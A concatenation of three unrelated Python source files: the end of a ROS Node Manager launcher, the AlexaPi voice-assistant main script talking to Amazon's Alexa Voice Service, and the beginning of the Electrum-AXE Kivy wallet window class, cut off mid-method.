if _HISTORY is not None:
try:
_HISTORY.storeAll()
except Exception as err:
sys.stderr.write("Error while store history: %s" % err)
from fkie_node_manager.main_window import MainWindow
# stop all threads in the main window
if isinstance(_MAIN_FORM, MainWindow):
if not hasattr(_MAIN_FORM, "on_finish"):
_MAIN_FORM.close_without_ask = True
_MAIN_FORM.close_signal.emit()
def set_terminal_name(name):
'''
Change the terminal name.
:param str name: New name of the terminal
'''
sys.stdout.write("\x1b]2;%s\x07" % name)
def set_process_name(name):
'''
Change the process name.
:param str name: name new process name
'''
try:
from ctypes import cdll, byref, create_string_buffer
libc = cdll.LoadLibrary('libc.so.6')
buff = create_string_buffer(len(name) + 1)
buff.value = name
libc.prctl(15, byref(buff), 0, 0, 0)
except Exception:
try:
import setproctitle
setproctitle.setproctitle(name)
except Exception:
pass
def init_settings():
global _SETTINGS
_SETTINGS = Settings()
def init_globals(masteruri):
'''
:return: True if the masteruri referred to localhost
:rtype: bool
'''
# initialize the global handler
global _NMD_CLIENT
global _SSH_HANDLER
global _SCREEN_HANDLER
global _START_HANDLER
global _NAME_RESOLUTION
global _HISTORY
_NMD_CLIENT = NmdClient()
# _NMD_CLIENT.start()
_SSH_HANDLER = SSHhandler()
_SCREEN_HANDLER = ScreenHandler()
_START_HANDLER = StartHandler()
_NAME_RESOLUTION = NameResolution()
_HISTORY = History()
# test where the roscore is running (local or remote)
__is_local('localhost') # fill cache
return __is_local(get_hostname(masteruri)) # fill cache
def init_arg_parser():
global __version__
parser = argparse.ArgumentParser()
parser.add_argument("--version", action="version", version="%s %s" % ("%(prog)s", __version__))
parser.add_argument("-f", "--file", nargs=1, help="loads the given file as default on start")
parser.add_argument("-m", "--muri", nargs=1, default='', help="starts ROS master with given URI, usefull on hosts "
"with multiple interfaces. ROS_HOSTNAME will be set "
"to the host of this URI, but only if it is not an IP.")
parser.add_argument("-p", "--port", nargs='?', default=22622, type=int, help="port for local monitoring (default: 22622)")
group = parser.add_argument_group('echo')
group.add_argument("--echo", nargs=2, help="starts an echo dialog instead of node manager", metavar=('name', 'type'))
group.add_argument("--hz", action="store_true", help="shows only the Hz value instead of topic content in echo dialog")
group.add_argument("--ssh", action="store_true", help="connects via SSH")
return parser
def init_echo_dialog(prog_name, masteruri, topic_name, topic_type, hz=False, use_ssh=False):
'''
Intialize the environment to start an echo window.
'''
# start ROS-Master, if not currently running
# StartHandler._prepareROSMaster(masteruri)
name = '%s_echo' % prog_name
rospy.init_node(name, anonymous=True, log_level=rospy.INFO)
set_terminal_name(name)
set_process_name(name)
from fkie_node_manager.echo_dialog import EchoDialog
global _SSH_HANDLER
_SSH_HANDLER = SSHhandler()
return EchoDialog(topic_name, topic_type, hz, masteruri, use_ssh=use_ssh)
def init_main_window(prog_name, masteruri, launch_files=[], port=22622):
'''
Intialize the environment to start Node Manager.
'''
# start ROS-Master, if not currently running
StartHandler._prepareROSMaster(masteruri)
# setup the loglevel
log_level = rospy.DEBUG
try:
log_level = getattr(rospy, rospy.get_param('/%s/log_level' % prog_name, "INFO"))
except Exception as err:
print("Error while set the log level: %s\n->INFO level will be used!" % err)
rospy.init_node(prog_name, anonymous=False, log_level=log_level)
set_terminal_name(prog_name)
set_process_name(prog_name)
from fkie_node_manager.main_window import MainWindow
local_master = init_globals(masteruri)
return MainWindow(launch_files, not local_master, port)
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# %%%%%%%%%%%%% MAIN %%%%%%%%
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
def main(name):
'''
Start the NodeManager or EchoDialog.
:param str name: the name propagated to the :meth:`rospy.init_node`
'''
try:
from python_qt_binding.QtGui import QApplication
except Exception:
try:
from python_qt_binding.QtWidgets import QApplication
except Exception:
sys.stderr.write("please install 'python_qt_binding' package!!")
sys.exit(-1)
init_settings()
global __version__
global __date__
__version__, __date__ = detect_version(PKG_NAME)
parser = init_arg_parser()
args = rospy.myargv(argv=sys.argv)
parsed_args = parser.parse_args(args[1:])
if parsed_args.muri:
masteruri = parsed_args.muri[0]
hostname = nmdhost.get_ros_hostname(masteruri)
os.environ['ROS_MASTER_URI'] = masteruri
if hostname:
os.environ['ROS_HOSTNAME'] = hostname
masteruri = settings().masteruri()
# Initialize Qt
global _QAPP
_QAPP = QApplication(sys.argv)
# decide to show main or echo dialog
global _MAIN_FORM
try:
if parsed_args.echo:
_MAIN_FORM = init_echo_dialog(name, masteruri, parsed_args.echo[0],
parsed_args.echo[1], parsed_args.hz,
parsed_args.ssh)
else:
_MAIN_FORM = init_main_window(name, masteruri, parsed_args.file, parsed_args.port)
except Exception as err:
import traceback
print(traceback.format_exc())
sys.exit("%s" % err)
exit_code = 0
# resize and show the qt window
if not rospy.is_shutdown():
# change path for access to the images of descriptions
os.chdir(settings().PACKAGE_DIR)
# _MAIN_FORM.resize(1024, 720)
screen_size = QApplication.desktop().availableGeometry()
if (_MAIN_FORM.size().width() >= screen_size.width() or
_MAIN_FORM.size().height() >= screen_size.height() - 24):
_MAIN_FORM.showMaximized()
else:
_MAIN_FORM.show()
exit_code = -1
try:
rospy.on_shutdown(finish)
exit_code = _QAPP.exec_()
if nmd() is not None:
nmd().stop()
except Exception:
if not rospy.is_shutdown():
import traceback
print(traceback.format_exc())
return exit_code
|
main.py
|
#! /usr/bin/env python
import importlib
import os
import logging
import tempfile
import signal
import shutil
import time
import sys
import threading
import json
import optparse
import email
import subprocess
import hashlib
import yaml
import requests
import coloredlogs
import alexapi.config
import alexapi.tunein as tunein
import alexapi.capture
import alexapi.triggers as triggers
from alexapi.exceptions import ConfigurationException
from alexapi.constants import RequestType, PlayerActivity
logging.basicConfig(format='%(asctime)s %(levelname)s: %(message)s')
coloredlogs.DEFAULT_FIELD_STYLES = {
'hostname': {'color': 'magenta'},
'programname': {'color': 'cyan'},
'name': {'color': 'blue'},
'levelname': {'color': 'magenta', 'bold': True},
'asctime': {'color': 'green'}
}
coloredlogs.DEFAULT_LEVEL_STYLES = {
'info': {'color': 'blue'},
'critical': {'color': 'red', 'bold': True},
'error': {'color': 'red'},
'debug': {'color': 'green'},
'warning': {'color': 'yellow'}
}
# Get arguments
parser = optparse.OptionParser()
parser.add_option('-s', '--silent',
dest="silent",
action="store_true",
default=False,
help="start without saying hello")
parser.add_option('-d', '--debug',
dest="debug",
action="store_true",
default=False,
help="display debug messages")
parser.add_option('--daemon',
dest="daemon",
action="store_true",
default=False,
help="Used by initd/systemd start script to reconfigure logging")
cmdopts, cmdargs = parser.parse_args()
silent = cmdopts.silent
debug = cmdopts.debug
config_exists = alexapi.config.filename is not None
if config_exists:
with open(alexapi.config.filename, 'r') as stream:
config = yaml.load(stream)
if debug:
log_level = logging.DEBUG
else:
if config_exists:
log_level = logging.getLevelName(config.get('logging', 'INFO').upper())
else:
log_level = logging.getLevelName('INFO')
if cmdopts.daemon:
coloredlogs.DEFAULT_LOG_FORMAT = '%(levelname)s: %(message)s'
else:
coloredlogs.DEFAULT_LOG_FORMAT = '%(asctime)s %(levelname)s: %(message)s'
coloredlogs.install(level=log_level)
alexa_logger = logging.getLogger('alexapi')
alexa_logger.setLevel(log_level)
logger = logging.getLogger(__name__)
if not config_exists:
logger.critical('Can not find configuration file. Exiting...')
sys.exit(1)
# Setup event commands
event_commands = {
'startup': "",
'pre_interaction': "",
'post_interaction': "",
'shutdown': "",
}
if 'event_commands' in config:
event_commands.update(config['event_commands'])
im = importlib.import_module('alexapi.device_platforms.' + config['platform']['device'] + 'platform', package=None)
cl = getattr(im, config['platform']['device'].capitalize() + 'Platform')
platform = cl(config)
class Player:
config = None
platform = None
pHandler = None
tunein_parser = None
navigation_token = None
playlist_last_item = None
progressReportRequired = []
def __init__(self, config, platform, pHandler): # pylint: disable=redefined-outer-name
self.config = config
self.platform = platform
self.pHandler = pHandler # pylint: disable=invalid-name
self.tunein_parser = tunein.TuneIn(5000)
def play_playlist(self, payload):
self.navigation_token = payload['navigationToken']
self.playlist_last_item = payload['audioItem']['streams'][-1]['streamId']
for stream in payload['audioItem']['streams']: # pylint: disable=redefined-outer-name
streamId = stream['streamId']
if stream['progressReportRequired']:
self.progressReportRequired.append(streamId)
url = stream['streamUrl']
if stream['streamUrl'].startswith("cid:"):
url = "file://" + tmp_path + hashlib.md5(stream['streamUrl'].replace("cid:", "", 1).encode()).hexdigest() + ".mp3"
if (url.find('radiotime.com') != -1):
url = self.tunein_playlist(url)
self.pHandler.queued_play(url, stream['offsetInMilliseconds'], audio_type='media', stream_id=streamId)
def play_speech(self, mrl):
self.stop()
self.pHandler.blocking_play(mrl)
def stop(self):
self.pHandler.stop()
def is_playing(self):
return self.pHandler.is_playing()
def get_volume(self):
return self.pHandler.volume
def set_volume(self, volume):
self.pHandler.set_volume(volume)
def playback_callback(self, requestType, playerActivity, streamId):
if (requestType == RequestType.STARTED) and (playerActivity == PlayerActivity.PLAYING):
self.platform.indicate_playback()
elif (requestType in [RequestType.INTERRUPTED, RequestType.FINISHED, RequestType.ERROR]) and (playerActivity == PlayerActivity.IDLE):
self.platform.indicate_playback(False)
if streamId:
if streamId in self.progressReportRequired:
self.progressReportRequired.remove(streamId)
gThread = threading.Thread(target=alexa_playback_progress_report_request, args=(requestType, playerActivity, streamId))
gThread.start()
if (requestType == RequestType.FINISHED) and (playerActivity == PlayerActivity.IDLE) and (self.playlist_last_item == streamId):
gThread = threading.Thread(target=alexa_getnextitem, args=(self.navigation_token,))
self.navigation_token = None
gThread.start()
def tunein_playlist(self, url):
logger.debug("TUNE IN URL = %s", url)
req = requests.get(url)
lines = req.content.decode().split('\n')
nurl = self.tunein_parser.parse_stream_url(lines[0])
if nurl:
return nurl[0]
return ""
# Playback handler
def playback_callback(requestType, playerActivity, streamId):
return player.playback_callback(requestType, playerActivity, streamId)
im = importlib.import_module('alexapi.playback_handlers.' + config['sound']['playback_handler'] + "handler", package=None)
cl = getattr(im, config['sound']['playback_handler'].capitalize() + 'Handler')
pHandler = cl(config, playback_callback)
player = Player(config, platform, pHandler)
path = os.path.realpath(__file__).rstrip(os.path.basename(__file__))
resources_path = os.path.join(path, 'resources', '')
tmp_path = os.path.join(tempfile.mkdtemp(prefix='AlexaPi-runtime-'), '')
MAX_VOLUME = 100
MIN_VOLUME = 30
def internet_on():
try:
requests.get('https://api.amazon.com/auth/o2/token')
logger.info("Connection OK")
return True
except requests.exceptions.RequestException:
logger.error("Connection Failed")
return False
class Token:
_token = ''
_timestamp = None
_validity = 3570
def __init__(self, aconfig):
self._aconfig = aconfig
if not self._aconfig.get('refresh_token'):
logger.critical("AVS refresh_token not found in the configuration file. "
"Run the setup again to fix your installation (see project wiki for installation instructions).")
raise ConfigurationException
self.renew()
def __str__(self):
if (not self._timestamp) or (time.time() - self._timestamp > self._validity):
logger.debug("AVS token: Expired")
self.renew()
return self._token
def renew(self):
logger.info("AVS token: Requesting a new one")
payload = {
"client_id": self._aconfig['Client_ID'],
"client_secret": self._aconfig['Client_Secret'],
"refresh_token": self._aconfig['refresh_token'],
"grant_type": "refresh_token"
}
url = "https://api.amazon.com/auth/o2/token"
try:
response = requests.post(url, data=payload)
resp = json.loads(response.text)
self._token = resp['access_token']
self._timestamp = time.time()
logger.info("AVS token: Obtained successfully")
except requests.exceptions.RequestException as exp:
logger.critical("AVS token: Failed to obtain a token: %s", str(exp))
# from https://github.com/respeaker/Alexa/blob/master/alexa.py
def alexa_speech_recognizer_generate_data(audio, boundary):
"""
Generate a iterator for chunked transfer-encoding request of Alexa Voice Service
Args:
audio: raw 16 bit LSB audio data
boundary: boundary of multipart content
Returns:
"""
logger.debug('Start sending speech to Alexa Voice Service')
chunk = '--%s\r\n' % boundary
chunk += (
'Content-Disposition: form-data; name="request"\r\n'
'Content-Type: application/json; charset=UTF-8\r\n\r\n'
)
data = {
"messageHeader": {
"deviceContext": [{
"name": "playbackState",
"namespace": "AudioPlayer",
"payload": {
"streamId": "",
"offsetInMilliseconds": "0",
"playerActivity": "IDLE"
}
}]
},
"messageBody": {
"profile": "alexa-close-talk",
"locale": "en-us",
"format": "audio/L16; rate=16000; channels=1"
}
}
yield bytes(chunk + json.dumps(data) + '\r\n', 'utf8')
chunk = '--%s\r\n' % boundary
chunk += (
'Content-Disposition: form-data; name="audio"\r\n'
'Content-Type: audio/L16; rate=16000; channels=1\r\n\r\n'
)
yield bytes(chunk, 'utf8')
for audio_chunk in audio:
yield audio_chunk
yield bytes('--%s--\r\n' % boundary, 'utf8')
logger.debug('Finished sending speech to Alexa Voice Service')
platform.indicate_processing()
def alexa_speech_recognizer(audio_stream):
# https://developer.amazon.com/public/solutions/alexa/alexa-voice-service/rest/speechrecognizer-requests
url = 'https://access-alexa-na.amazon.com/v1/avs/speechrecognizer/recognize'
boundary = 'this-is-a-boundary'
headers = {
'Authorization': 'Bearer %s' % token,
'Content-Type': 'multipart/form-data; boundary=%s' % boundary,
'Transfer-Encoding': 'chunked',
}
data = alexa_speech_recognizer_generate_data(audio_stream, boundary)
resp = requests.post(url, headers=headers, data=data)
platform.indicate_processing(False)
process_response(resp)
def alexa_getnextitem(navigationToken):
# https://developer.amazon.com/public/solutions/alexa/alexa-voice-service/rest/audioplayer-getnextitem-request
logger.debug("Sending GetNextItem Request...")
url = 'https://access-alexa-na.amazon.com/v1/avs/audioplayer/getNextItem'
headers = {
'Authorization': 'Bearer %s' % token,
'content-type': 'application/json; charset=UTF-8'
}
data = {
"messageHeader": {},
"messageBody": {
"navigationToken": navigationToken
}
}
response = requests.post(url, headers=headers, data=json.dumps(data))
process_response(response)
def alexa_playback_progress_report_request(requestType, playerActivity, stream_id):
# https://developer.amazon.com/public/solutions/alexa/alexa-voice-service/rest/audioplayer-events-requests
# streamId Specifies the identifier for the current stream.
# offsetInMilliseconds Specifies the current position in the track, in milliseconds.
# playerActivity IDLE, PAUSED, or PLAYING
logger.debug("Sending Playback Progress Report Request...")
headers = {
'Authorization': 'Bearer %s' % token
}
data = {
"messageHeader": {},
"messageBody": {
"playbackState": {
"streamId": stream_id,
"offsetInMilliseconds": 0,
"playerActivity": playerActivity.upper()
}
}
}
if requestType.upper() == RequestType.ERROR:
# The Playback Error method sends a notification to AVS that the audio player has experienced an issue during playback.
url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackError"
elif requestType.upper() == RequestType.FINISHED:
# The Playback Finished method sends a notification to AVS that the audio player has completed playback.
url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackFinished"
elif requestType.upper() == PlayerActivity.IDLE: # This is an error as described in https://github.com/alexa-pi/AlexaPi/issues/117
# The Playback Idle method sends a notification to AVS that the audio player has reached the end of the playlist.
url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackIdle"
elif requestType.upper() == RequestType.INTERRUPTED:
# The Playback Interrupted method sends a notification to AVS that the audio player has been interrupted.
# Note: The audio player may have been interrupted by a previous stop Directive.
url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackInterrupted"
elif requestType.upper() == "PROGRESS_REPORT":
# The Playback Progress Report method sends a notification to AVS with the current state of the audio player.
url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackProgressReport"
elif requestType.upper() == RequestType.STARTED:
# The Playback Started method sends a notification to AVS that the audio player has started playing.
url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackStarted"
response = requests.post(url, headers=headers, data=json.dumps(data))
if response.status_code != 204:
logger.warning("(alexa_playback_progress_report_request Response) %s", response)
else:
logger.debug("Playback Progress Report was Successful")
def process_response(response):
logger.debug("Processing Request Response...")
if response.status_code == 200:
try:
data = bytes("Content-Type: ", 'utf-8') + bytes(response.headers['content-type'], 'utf-8') + bytes('\r\n\r\n', 'utf-8') + response.content
msg = email.message_from_bytes(data) # pylint: disable=no-member
except AttributeError:
data = "Content-Type: " + response.headers['content-type'] + '\r\n\r\n' + response.content
msg = email.message_from_string(data)
for payload in msg.get_payload():
if payload.get_content_type() == "application/json":
j = json.loads(payload.get_payload())
logger.debug("JSON String Returned: %s", json.dumps(j, indent=2))
elif payload.get_content_type() == "audio/mpeg":
filename = tmp_path + hashlib.md5(payload.get('Content-ID').strip("<>").encode()).hexdigest() + ".mp3"
with open(filename, 'wb') as f:
f.write(payload.get_payload(decode=True))
else:
logger.debug("NEW CONTENT TYPE RETURNED: %s", payload.get_content_type())
# Now process the response
if 'directives' in j['messageBody']:
if not j['messageBody']['directives']:
logger.debug("0 Directives received")
for directive in j['messageBody']['directives']:
if directive['namespace'] == 'SpeechSynthesizer':
if directive['name'] == 'speak':
player.play_speech("file://" + tmp_path + hashlib.md5(directive['payload']['audioContent'].replace("cid:", "", 1).encode()).hexdigest() + ".mp3")
elif directive['namespace'] == 'SpeechRecognizer':
if directive['name'] == 'listen':
logger.debug("Further Input Expected, timeout in: %sms", directive['payload']['timeoutIntervalInMillis'])
player.play_speech(resources_path + 'beep.wav')
timeout = directive['payload']['timeoutIntervalInMillis'] / 116
audio_stream = capture.silence_listener(timeout)
# now process the response
alexa_speech_recognizer(audio_stream)
elif directive['namespace'] == 'AudioPlayer':
if directive['name'] == 'play':
player.play_playlist(directive['payload'])
elif directive['namespace'] == "Speaker":
# speaker control such as volume
if directive['name'] == 'SetVolume':
vol_token = directive['payload']['volume']
type_token = directive['payload']['adjustmentType']
if (type_token == 'relative'):
volume = player.get_volume() + int(vol_token)
else:
volume = int(vol_token)
if (volume > MAX_VOLUME):
volume = MAX_VOLUME
elif (volume < MIN_VOLUME):
volume = MIN_VOLUME
player.set_volume(volume)
logger.debug("new volume = %s", volume)
# Additional Audio Iten
elif 'audioItem' in j['messageBody']:
player.play_playlist(j['messageBody'])
return
elif response.status_code == 204:
logger.debug("Request Response is null (This is OKAY!)")
else:
logger.info("(process_response Error) Status Code: %s", response.status_code)
response.connection.close()
platform.indicate_failure()
trigger_thread = None
def trigger_callback(trigger):
global trigger_thread
logger.info("Triggered: %s", trigger.name)
triggers.disable()
trigger_thread = threading.Thread(target=trigger_process, args=(trigger,))
trigger_thread.setDaemon(True)
trigger_thread.start()
def trigger_process(trigger):
if player.is_playing():
player.stop()
# clean up the temp directory
if not debug:
for some_file in os.listdir(tmp_path):
file_path = os.path.join(tmp_path, some_file)
try:
if os.path.isfile(file_path):
os.remove(file_path)
except Exception as exp: # pylint: disable=broad-except
logger.warning(exp)
if event_commands['pre_interaction']:
subprocess.Popen(event_commands['pre_interaction'], shell=True, stdout=subprocess.PIPE)
force_record = None
if trigger.event_type in triggers.types_continuous:
force_record = (trigger.continuous_callback, trigger.event_type in triggers.types_vad)
if trigger.voice_confirm:
player.play_speech(resources_path + 'alexayes.mp3')
audio_stream = capture.silence_listener(force_record=force_record)
alexa_speech_recognizer(audio_stream)
triggers.enable()
if event_commands['post_interaction']:
subprocess.Popen(event_commands['post_interaction'], shell=True, stdout=subprocess.PIPE)
def cleanup(signal, frame): # pylint: disable=redefined-outer-name,unused-argument
triggers.disable()
triggers.cleanup()
capture.cleanup()
pHandler.cleanup()
platform.cleanup()
shutil.rmtree(tmp_path)
if event_commands['shutdown']:
subprocess.Popen(event_commands['shutdown'], shell=True, stdout=subprocess.PIPE)
sys.exit(0)
if __name__ == "__main__":
if event_commands['startup']:
subprocess.Popen(event_commands['startup'], shell=True, stdout=subprocess.PIPE)
try:
capture = alexapi.capture.Capture(config, tmp_path)
capture.setup(platform.indicate_recording)
triggers.init(config, trigger_callback, capture)
triggers.setup()
except ConfigurationException as exp:
logger.critical(exp)
sys.exit(1)
pHandler.setup()
platform.setup()
for sig in (signal.SIGABRT, signal.SIGILL, signal.SIGINT, signal.SIGSEGV, signal.SIGTERM):
signal.signal(sig, cleanup)
logger.info("Checking Internet Connection ...")
while not internet_on():
time.sleep(1)
try:
token = Token(config['alexa'])
if not str(token):
raise RuntimeError
except (ConfigurationException, RuntimeError):
platform.indicate_failure()
sys.exit(1)
platform_trigger_callback = triggers.triggers['platform'].platform_callback if 'platform' in triggers.triggers else None
platform.after_setup(platform_trigger_callback)
triggers.enable()
if not silent:
player.play_speech(resources_path + "hello.mp3")
platform.indicate_success()
while True:
time.sleep(1)
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
from electrum_axe.bitcoin import TYPE_ADDRESS
from electrum_axe.storage import WalletStorage
from electrum_axe.wallet import Wallet
from electrum_axe.paymentrequest import InvoiceStore
from electrum_axe.util import profiler, InvalidPassword
from electrum_axe.plugin import run_hook
from electrum_axe.util import format_satoshis, format_satoshis_plain
from electrum_axe.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_axe.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_axe.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_axe.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_axe.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_axe_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_axe.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum_axe/gui/kivy/data/fonts/Roboto.ttf',
'electrum_axe/gui/kivy/data/fonts/Roboto.ttf',
'electrum_axe/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum_axe/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum_axe.util import (base_units, NoDynamicFeeEstimates, decimal_point_to_base_unit_name,
base_unit_name_to_decimal_point, NotEnoughFunds)
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
host, port, protocol, proxy, auto_connect = self.network.get_parameters()
self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum_axe import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
for index, b in self.network.blockchains.items():
if name == b.get_name():
self.network.follow_chain(index)
names = [self.network.blockchains[b].get_name() for b in chains]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'axe':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def _get_bu(self):
decimal_point = self.electrum_config.get('decimal_point', 8)
return decimal_point_to_base_unit_name(decimal_point)
def _set_bu(self, value):
assert value in base_units.keys()
decimal_point = base_unit_name_to_decimal_point(value)
self.electrum_config.set_key('decimal_point', decimal_point, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
self.pause_time = 0
App.__init__(self)#, **kwargs)
title = _('Electrum-AXE App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum_axe.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('axe:'):
self.set_URI(data)
return
# try to decode transaction
from electrum_axe.transaction import Transaction
from electrum_axe.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum_axe.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('electrum_axe/gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
